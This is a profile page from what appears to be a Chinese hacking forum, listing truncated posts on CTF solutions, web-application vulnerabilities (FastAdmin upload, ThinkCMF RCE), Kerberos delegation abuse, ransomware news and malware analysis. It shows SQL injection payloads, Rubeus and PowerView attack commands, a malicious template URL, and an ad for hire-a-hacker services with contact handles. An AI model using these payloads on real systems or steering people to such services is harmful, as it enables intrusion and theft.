Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

This Wind

Administrator
  • Content Count

    338
  • Joined

  • Last visited

  • Days Won

    33
  • Donations

    $439.00 

This Wind last won the day on March 26

This Wind had the most liked content!

Community Reputation

43 Excellent

Recent Profile Visitors

10,184 profile views
  1. [toc] 前言 很好的一个题,偏向于真实的实战环境,但是当时没有做出来真的很可惜,幸好赵总在buuctf上复现了这道题,可以让我这个菜鸡得以复现。 解题 进入题目,冬奥会火炬???: 题目给了源码,源码就两个,都非常简单: user.php PHP 1 2 3 4 5 <?php class User{ public $count; } ?> 就定义了一个简单User类。 add_api.php PHP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $user->count+=1; setcookie("data",serialize($us
  2. [toc] 前言 感觉一晚上考完了高考,刚经历完一模二模三模的你还肝得动吗? easy_sql 经测试登录密码出存在 sql 注入: SQL 1 passwd=0')||extractvalue(1,concat(0x7c,(database()),0x7c))#&uname=123 之后用 sqlmap 跑出两个数据表 users、flag,并且过滤了 information,所以用为无列名注入,用 join…using 爆出字段名: SQL 1 2 3 4 5 passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a)b),0x7c))#&uname=123 // id passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a using(id))
  3. 就在一周前发生严重的勒索软件事件后,Colonial Pipeline将其所有系统恢复为可运行状态时,攻击背后的网络犯罪集团DarkSide声称已夺走了基础设施的控制权,理由是执法部门没收了该设备。 该团伙经营的所有黑暗网站,包括其DarkSide Leaks博客,勒索赎回网站以及违约数据内容传送网络(CDN)服务器,都已经不可用,并且在撰写本文时仍然无法访问。此外,根据DarkSide运营商传递给其附属公司的一份说明,据称,他们的加密货币钱包中的资金被盗窃至一个未知帐户。 英特尔471获得的公告说: “目前,这些服务器无法通过SSH访问,并且主机面板已被阻止。” 开发是在DarkSide出于“来自美国的压力”而关闭其勒索软件(RaaS)联盟计划的良好时机,该组织指出,他们将向受攻击的公司的所有分支机构发放解密器。 ,并承诺在5月23日之前补偿所有未清的财务义务。 尽管撤军事件标志着殖民地管道传奇事件的出人意料的转折,但值得注意的是,没有证据公开证实这些说法,引发了人们的担忧,即这可能是一种出口骗局,这是近年来困扰非法黑网 市场的一种卑鄙的策略,或者该团伙给人的印象是,它已从聚光灯下撤退,只是重新塑造品牌并秘密地以另一种形式继续运营,而没有引起不必要的关注。 根据区块链分析公司Elliptic的说法,DarkSide勒索者使用的比特
  4. 概述 该漏洞解决了两个问题 1.禁止协议转换/协议过渡 2.受保护的用户和敏感用户不能被委派 具体设置表现为DC上设置Service1计算机账户为“仅使用Kerberos”而非“使用任何身份验证协议” 域环境 DC:WIN-5CHMN9C4UES.YAYI.local (Windows Server 2012) 域内两台机器: one2008.YAYI.local (Windows Server 2008) WIN-BMIO66D4K15.YAYI.local (Windows 7) 域用户: fwwr joke 传统的约束委派绕过 服务用户: 委派对象:目标机器WIN-5CHMN9C4UES.YAYI.local 常规的约束委派利用: 1. 得到约束委派机器的用户凭证 2. 发现委派用户委派的目标机器 3. 获取RC4利用 powerview查看约束委派的机器: Get-DomainComputer -TrustedToAuth -Properties distinguishedname,msds-allowedtodelegateto | fl Rubeus一条命令实现约束委派: Rubeus.exe s4u /
  5. 参考链接:https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america VT查杀 初始文件 方式:office vba远程模板加载 随机加载http://azulviagens.online/1-9.docx将下载并执行其中一个模板。 每个文件都具有相同的内容(相同的SHA-256:338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9) 模板文件 模板文件(“ 1.docx” …“ 9x.docx”)遵循图4(如下所示)所示的结构。结构中的settings.xml具有指向XLSM文件的“目标”字段,该字段位于DOCX文件结构的“嵌入”目录中。XLSM文件“ Microsoft_Excel_Macro-Enabled_Worksheet.xlsm”到“ Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm”具有相同的内容(相同的SHA-256:32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2)。当Microsoft Wo
  6. 什么是缓冲区溢出? 缓冲区是易失性的内存分配,它们在将数据从一个位置传输到另一位置时临时保存数据。当正在处理的数据超出存储缓冲区的存储容量时,将发生缓冲区溢出。这导致程序覆盖相邻存储器位置中的过大数据,从而导致缓冲区溢出。当我们对char类型的缓冲区进行操作时,将发生缓冲区溢出。 我们将通过一些示例来尝试理解这个概念。例如,缓冲区的设计方式是接受8个字节的数据,在这种情况下,如果用户输入的数据超过8个字节,则超过8个字节的数据将覆盖相邻的内存,从而超过分配的缓冲区边界。最终将产生分段错误,随后出现许多其他错误,从而导致程序执行被终止。 缓冲区溢出的类型 缓冲区溢出有两种类型。让我们讨论两者的简短介绍。 堆栈缓冲区溢出/Vanilla Buffer缓冲区溢出 当程序覆盖缓冲区边界之外的程序的调用堆栈上的内存地址时,就会发生这种情况,缓冲区边界的长度是固定的。在堆栈缓冲区溢出中,多余的数据将被写入位于堆栈上的相邻缓冲区中。由于与堆栈上溢出的相邻内存位置中的内存损坏相关的错误,通常会导致应用程序崩溃。 堆缓冲区溢出 堆是用于管理动态内存分配的内存结构。它通常用于分配在编译时未知大小的内存,因为所需的内存量太大,以致于无法将其装入堆栈中。堆溢出或溢出是堆数据区域中发生的一种缓冲区溢出。基于堆的溢出利用不同于基于堆栈的溢出利用。
  7. 这个很简单啊 用shell直接烧进去就行了。
  8. 漏洞点:application \ api \ controller \ Common.php 触发突破的网址:/ index / ajax / upload 要求:application \ extra \ upload.php里的chunking为true(分片上传为true) 复现过程 脆弱点分析 需要包括以下的post请求参数才行 1.chunkid参数 2.action参数 3.chunkindex参数 4.chunkcount参数 5.filename参数 调用chunk函数chunk($ chunkid,$ chunkindex,$ chunkcount);进入分片文件上传 跟进chunk函数, 1.首先$ destDir = RUNTIME_PATH / chunks路径,RUNTIME = ROOT_PATH。'运行' 。DS(DS =根据系统的文件分隔符) 2. $ fileName = $
  9. CloudFlare通知我们他们已经更新了默认的WAF规则,以阻止基于java.lang.ProcessBuilder的有效负载。尽管可以使用其他技术来开发替代代码执行有效负载,但我们已经确认,下面描述的有效负载不再有效。我们要赞扬CloudFlare参与对话并采取积极行动来保护其网络及其用户。 2020年4月22日更新:这篇文章的原始版本包含不正确的有效载荷字符串,其中包含不必要的%23。该帖子已使用更正的有效载荷进行了更新。 在最近的长期红队运作中,有必要利用OGNL注入漏洞来获得客户子公司周围的立足点。在对内部网络进行广泛的秘密侦查并利用深奥的Active Directory漏洞之后,有可能利用并损害子公司与母公司之间的林间信任。最终,这导致了母公司的灾难性妥协,并成功完成了运营前概述的所有红色团队目标。 在红色团队运营期间,绝大多数立足点都来自网络钓鱼。使用物理穿透力可以获得少量立足点。在某些情况下,确定子公司与母公司共享内部网络后,子公司本身就成为基于网络的攻击的目标,这通常为寻找更多关键漏洞获得立足点提供了新途径。 这个特殊的子公司从2006年开始运营Confluence的古老版本。但是,此Confluence实例是 在CloudFlare W eb应用程序防火墙(WAF )之后设置的,从而抵消了针对OGNL或SSTI漏洞 的
  10. 概述 漏洞发生于:2021年/4月1号 漏洞点:application\api\controller\Common.php 触发漏洞的url:/index/ajax/upload 要求:application\extra\upload.php里的chunking为true (分片上传为true) 复现过程 漏洞点分析 需要包括以下的post请求参数才行 1.chunkid参数 2.action参数 3.chunkindex参数 4.chunkcount参数 5.filename参数 随后进入if判断,当action参数不为merge或method不为clean的时候。调用chunk函数chunk($chunkid, $chunkindex, $chunkcount);进入分片文件上传 跟进chunk函数, 1.首先$destDir=RUNTIME_PATH/chunks路径, RUNTIME=ROOT_PATH . ‘runtime’ . DS (DS=根据系统的文件分隔符) 2.$fileName=$chunkid-$chunindex.part //$chunkid和$chunindex都
  11. 前言 2021年3月2日,几家公司发布了 有关Microsoft Exchange Server内部零日漏洞被野外利用的报告。以下漏洞使攻击者可以破坏易受攻击的Microsoft Exchange Server。结果,攻击者将可以访问所有注册的电子邮件帐户,或者能够在Exchange Server上下文中执行任意代码(远程代码执行或RCE)。在后一种情况下,攻击者还可以在受感染的服务器上实现持久性。 总共发现了四个漏洞: CVE-2021-26855。服务器端请求伪造(SSRF)允许未经授权的攻击者使用特殊构造的请求来查询服务器,这将导致远程代码执行。被利用的服务器随后会将查询转发到另一个目标。 CVE-2021-26857由统一消息服务内的不安全数据反序列化引起。潜在地允许攻击者执行任意代码(RCE)。由于对用户文件的控制不足,攻击者能够伪造数据查询的主体,并诱使高特权服务执行代码。 CVE-2021-26858。利用此漏洞,授权的Exchange用户可以使用自己的数据覆盖系统中的任何现有文件。为此,攻击者必须破坏管理凭据或利用另一个漏洞,例如SSRF CVE-2021-26855。 CVE-2021-27065与CVE-2021-26858类似,并允许授权攻击者覆盖Exchange服务器上的任何系统文件。
  12. 漏洞成因 根据ThinkPHP框架约定可以通过a参数来指定对应的函数名,但是该函数的修饰符必须为Public, 而添加的代码正好符合该条件。 可以通过如下URL进行访问,并且可以添加GET参数arg1传递给函数。 漏洞危害 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 复现过程 漏洞出在:application\Portal\Controller\IndexController.class.php 首先引用Common\Controller\HomebaseController控制类文件,然后调用display函数 跟入display函数看描述就是可以自定义加载模版,通过$this->parseTemplate 函数根据约定确定模版路径,如果不符合原先的约定将会从当前目录开始匹配。 public function parseTemplate($template='') { $tmpl_path=C("SP_TMPL_PATH"); // 前台模
  13. 官方小组团队渗透测试丨黑客攻防丨网络安全丨编程定制丨接单 下列为联系方式。 Official Team Team Penetration Test Hacker Attack and Defense Network Security Programming Customization List The following is the contact information. TG:@H4MrX QQ 2971235687 蝙蝠ID:4776201 本站业务可以开通发票 This site business can open invoice

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines